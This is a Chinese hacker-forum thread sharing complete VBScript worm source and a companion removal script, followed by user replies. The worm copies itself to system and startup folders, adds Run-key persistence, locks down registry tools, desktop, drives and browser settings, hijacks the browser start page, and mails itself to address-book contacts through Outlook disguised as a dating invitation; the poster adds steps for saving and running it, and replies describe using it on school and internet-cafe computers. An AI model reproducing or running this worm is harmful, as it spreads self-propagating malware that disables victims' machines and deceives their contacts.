设为首页收藏本站
查看: 39650|回复: 154

蠕虫病毒源码!附带解毒源码!

  [复制链接]
  • TA的每日心情
    擦汗
    2019-3-9 08:55
  • 签到天数: 49 天

    [LV.5]常住居民I

    发表于 2013-12-1 16:23:46 | 显示全部楼层 |阅读模式
    本帖最后由 1249093136 于 2013-12-1 16:49 编辑

                  蠕虫病毒源码如下:(请勿用于非法事情!!纯属参考!!)          高手勿喷!只想让新手了解下!








    On Error Resume Next
    Set fs=CreateObject("Scripting.FileSystemObject")
    Set dir1=fs.GetSpecialFolder(0)
    Set dir2=fs.GetSpecialFolder(1)
    Set so=CreateObject("Scripting.FileSystemObject")
    dim r
    Set r=CreateObject("Wscript.Shell")
    so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Win32system.vbs")
    so.GetFile(WScript.ScriptFullName).Copy(dir2&"\Win32system.vbs")
    so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Start Menu\Programs\启动\Win32system.vbs")
    r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
    r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD"
    r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",63000000,"REG_DWORD"
    r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"
    r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry",""
    r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD"
    r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD"
    r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system","Win32system.vbs"
    r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",1,"REG_DWORD"
    r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD"
    r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskBar",1,"REG_DWORD"
    r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"
    r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD"
    r.Regwrite "HKLM\Software\CLASSES\.reg\","txtfile"
    r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","你中毒了!"
    r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","友情娱乐!找我要解毒文件!"
    Set ol=CreateObject("Outlook.Application")
    On Error Resume Next
    For x=1 To 100
    Set Mail=ol.CreateItem(0)
    Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
    Mail.Subject="今晚你来吗?"
    Mail.Body="朋友你好:您的朋友Rose给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运!            同城约会网"
    Mail.Attachments.Add(dir2&"Win32system.vbs")
    Mail.Send
    Next
    ol.Quit
    r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",1,"REG_DWORD"
    r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",1,"REG_DWORD"
    r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs",1,"REG_DWORD"
    r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen",1,"REG_DWORD"
    r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced",1,"REG_DWORD"
    r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet",1,"REG_DWORD"
    r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig",1,"REG_DWORD"
    r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD"
    r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History",1,"REG_DWORD"
    r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock",1,"REG_DWORD"
    r.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Start Page","http://liudemin.myetang.com"
    r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",1,"REG_DWORD"
    r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings",1,"REG_DWORD"
    r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",1,"REG_DWORD"
    r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions",1,"REG_DWORD"
    r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",1,"REG_DWORD"





    后缀名为:vbs


                                               为了防止意外发生。以下是解毒代码!↘


    Set fs=CreateObject("Scripting.FileSystemObject")
    Set dir1=fs.GetSpecialFolder(0)
    Set dir2=fs.GetSpecialFolder(1)
    Set so=CreateObject("Scripting.FileSystemObject")
    dim r
    Set r=CreateObject("Wscript.Shell")
    r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\deltree.exe","start.exe /m deltree /y "&dir1&"\Win32system.vbs"
    r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\deltree.exe","start.exe /m deltree /y "&dir2&"\Win32system.vbs"
    r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\deltree.exe","start.exe /m deltree /y "&dir1&"\Start Menu\Programs\启动\Win32system.vbs"
    r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",0,"REG_DWORD"
    r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",0,"REG_DWORD"
    r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",0,"REG_DWORD"
    r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0,"REG_DWORD"
    r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry","scanregw.exe /autorun"
    r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",0,"REG_DWORD"
    r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",0,"REG_DWORD"
    r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system",""
    r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",0,"REG_DWORD"
    r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",0,"REG_DWORD"
    r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskBar",0,"REG_DWORD"
    r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",0,"REG_DWORD"
    r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",0,"REG_DWORD"
    r.Regwrite "HKLM\Software\CLASSES\.reg\","regfile"
    r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption",""
    r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText",""
    r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",0,"REG_DWORD"
    r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",0,"REG_DWORD"
    r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs",0,"REG_DWORD"
    r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen",0,"REG_DWORD"
    r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced",0,"REG_DWORD"
    r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet",0,"REG_DWORD"
    r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig",0,"REG_DWORD"
    r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",0,"REG_DWORD"
    r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History",0,"REG_DWORD"
    r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock",0,"REG_DWORD"
    r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",0,"REG_DWORD"
    r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings",0,"REG_DWORD"
    r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",0,"REG_DWORD"
    r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions",0,"REG_DWORD"
    r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",0,"REG_DWORD"




    后缀名同样为:vbs


    不做伸手党!伸手党可耻!

    点评

    楼主装逼,这更本不是你写的,是用VBS病毒生成器写的:L,鄙视这种行为  发表于 2015-6-29 13:07
  • TA的每日心情

    2017-4-4 21:57
  • 签到天数: 335 天

    [LV.8]以坛为家I

    发表于 2013-12-1 21:08:16 来自手机 | 显示全部楼层
    还不错,下次到网吧玩玩
    回复 支持 1 反对 2

    使用道具 举报

  • TA的每日心情
    奋斗
    2016-6-11 16:23
  • 签到天数: 61 天

    [LV.6]常住居民II

    发表于 2013-12-1 22:41:20 | 显示全部楼层
    1249093136 发表于 2013-12-1 18:19
    1:打开笔记本
    2:把病毒代码复制进去
    3:点 笔记本 里的文件 再点 另存为  

    话说我今天在学校机房试了,然后电脑就不能用了。
    回复 支持 1 反对 0

    使用道具 举报

  • TA的每日心情
    奋斗
    2014-2-21 09:53
  • 签到天数: 168 天

    [LV.7]常住居民III

    发表于 2013-12-1 17:09:21 | 显示全部楼层
    谁试试????  牛比!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    2019-3-9 08:55
  • 签到天数: 49 天

    [LV.5]常住居民I

     楼主| 发表于 2013-12-1 17:50:35 | 显示全部楼层
    红盟小垃圾 发表于 2013-12-1 17:09
    谁试试????  牛比!

    我试过了!恐怖!不过有解毒的,还好……

    点评

    恐怖?你形容一下有多恐怖  发表于 2013-12-1 22:25
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2016-6-11 16:23
  • 签到天数: 61 天

    [LV.6]常住居民II

    发表于 2013-12-1 17:55:22 | 显示全部楼层
    怎么用,求解
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    2019-3-9 08:55
  • 签到天数: 49 天

    [LV.5]常住居民I

     楼主| 发表于 2013-12-1 18:19:57 | 显示全部楼层
    734543358 发表于 2013-12-1 17:55
    怎么用,求解

    1:打开笔记本
    2:把病毒代码复制进去
    3:点 笔记本 里的文件 再点 另存为  
    4:名字随便你,后缀名:vbs
    5:虚拟机实验
    也可以不用虚拟机!不用虚拟机的看6     
    6:等死!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2017-2-17 18:05
  • 签到天数: 34 天

    [LV.5]常住居民I

    发表于 2013-12-1 18:20:36 | 显示全部楼层
    我被吓到了,用了是有什么后果呀?特好奇,又不敢弄
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    2019-3-9 08:55
  • 签到天数: 49 天

    [LV.5]常住居民I

     楼主| 发表于 2013-12-1 18:23:06 | 显示全部楼层
    芬小豆 发表于 2013-12-1 18:20
    我被吓到了,用了是有什么后果呀?特好奇,又不敢弄

    不会怎样……因为有解毒源码!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2017-2-17 18:05
  • 签到天数: 34 天

    [LV.5]常住居民I

    发表于 2013-12-1 18:52:40 | 显示全部楼层
    1249093136 发表于 2013-12-1 18:23
    不会怎样……因为有解毒源码!

    哦  我还是先复制下来吧  不敢用  嘿嘿
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2019-4-26 15:11
  • 签到天数: 46 天

    [LV.5]常住居民I

    发表于 2013-12-2 00:08:37 来自手机 | 显示全部楼层
    学习了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2016-12-18 09:54
  • 签到天数: 77 天

    [LV.6]常住居民II

    发表于 2013-12-2 08:22:02 来自手机 | 显示全部楼层
    厉害!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2013-12-2 15:26:22 来自手机 | 显示全部楼层
    怎么复制啊我手机复制不了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    2014-1-19 15:42
  • 签到天数: 16 天

    [LV.4]偶尔看看III

    发表于 2013-12-3 17:12:40 | 显示全部楼层
    不做伸手党
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    郁闷
    2018-9-1 19:16
  • 签到天数: 111 天

    [LV.6]常住居民II

    发表于 2013-12-3 21:10:20 来自手机 | 显示全部楼层
    电脑都不能用了。。。要怎么解毒?
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    关闭

    站长推荐 上一条 /1 下一条

    红盟社区--中国红客联盟 

    Processed in 0.090254 second(s), 31 queries.

    站点统计| 举报| Archiver| 手机版| 黑屋 |   

    Powered by HUC © 2001-2017 Comsenz Inc.

    手机扫我进入移动触屏客户端

    关注我们可获取更多热点资讯

    Honor accompaniments. theme macfee

    快速回复 返回顶部 返回列表